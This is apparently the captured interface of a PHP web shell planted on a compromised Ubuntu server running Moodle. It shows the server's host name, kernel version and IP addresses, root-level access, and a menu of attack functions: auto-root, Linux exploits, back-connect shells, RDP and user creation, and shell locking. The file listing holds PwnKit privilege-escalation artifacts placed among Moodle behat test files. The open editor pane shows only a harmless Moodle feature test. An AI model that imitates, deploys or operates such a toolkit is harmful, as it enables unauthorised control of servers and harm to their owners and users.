Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
files /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_custom_file_type.feature
1.6
KB
-rwxrwxrwx
course_files.feature
1.42
KB
-rwxrwxrwx
license_help_modal.feature
2.44
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license_help_modal.feature
@core @core_files Feature: View licence links In order to get select the applicable licence when uploading a file As a user I need to be able to navigate to a page containing licence terms from the file manager @javascript Scenario: Uploading a file displays licence list modal Given I log in as "admin" And I follow "Manage private files..." And I wait until the page is ready And I follow "Add..." And I follow "Upload a file" And I click on "Help with Choose licence" "icon" in the "File picker" "dialogue" Then I should see "Follow these links for further information on the available licence options:" @javascript @_file_upload Scenario: Altering a file should display licence list modal Given I log in as "admin" And I follow "Manage private files..." And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I press "Save changes" And I follow "Manage private files..." And I click on "empty.txt" "link" And I click on "Help with Choose licence" "icon" Then I should see "Follow these links for further information on the available licence options:" @javascript @_file_upload Scenario: Recent files should display licence list modal Given I log in as "admin" And I follow "Manage private files..." And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I press "Save changes" And I follow "Manage private files..." And I follow "Add..." And I click on "Recent files" "link" in the "File picker" "dialogue" And I click on "empty.txt" "link" in the "File picker" "dialogue" And I click on "Help with Choose licence" "icon" in the ".fp-setlicense" "css_element" Then I should see "Follow these links for further information on the available licence options:" @javascript @_file_upload Scenario: Private files should display licence list modal Given I log in as "admin" And I follow "Manage private files..." And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager And I press "Save changes" And I follow "Manage private files..." And I follow "Add..." And I click on "Private files" "link" in the "File picker" "dialogue" And I click on "empty.txt" "link" in the "File picker" "dialogue" And I click on "Help with Choose licence" "icon" in the ".fp-setlicense" "css_element" Then I should see "Follow these links for further information on the available licence options:"
Close